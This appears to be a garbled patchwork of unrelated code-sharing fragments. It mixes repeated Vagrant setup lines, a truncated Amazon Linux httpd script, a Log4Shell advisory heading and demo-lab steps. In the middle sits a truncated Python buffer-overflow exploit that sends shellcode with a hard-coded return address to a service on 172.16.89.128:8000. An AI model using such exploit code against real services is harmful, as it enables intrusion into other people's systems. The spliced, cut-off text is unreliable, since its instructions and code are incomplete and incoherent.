You should install VirtualBox and Vagrant before you start.
You should create a Vagrantfile
in an empty directory with the following content:
#!/bin/bash | |
######################################## | |
##### USE THIS WITH AMAZON LINUX 2 ##### | |
######################################## | |
# get admin privileges | |
sudo su | |
# install httpd (Linux 2 version) |
import httplib | |
host = "172.16.89.128" | |
port = 8000 | |
buffer_addr = "\x98\xF1\xFF\xBF" # 0xbffff198 | |
payload = """ | |
\xEB\x19\x31\xC0\x31\xDB\x31\xD2\x31\xC9\xB0\x04\xB3 | |
\x01\x59\xB2\x07\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD | |
\x80\xE8\xE2\xFF\xFF\xFF\x68\x61\x63\x6B\x65\x64\x21 |
You should install VirtualBox and Vagrant before you start.
You should create a Vagrantfile
in an empty directory with the following content:
Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
To prep for the demo environment begin by logging into the "dev" system using the Console (Access > Console)
Open a series of terminal windows using Visual Studio Code (VSCode). From the right set of controls, you should have five terminal sessions total as seen below.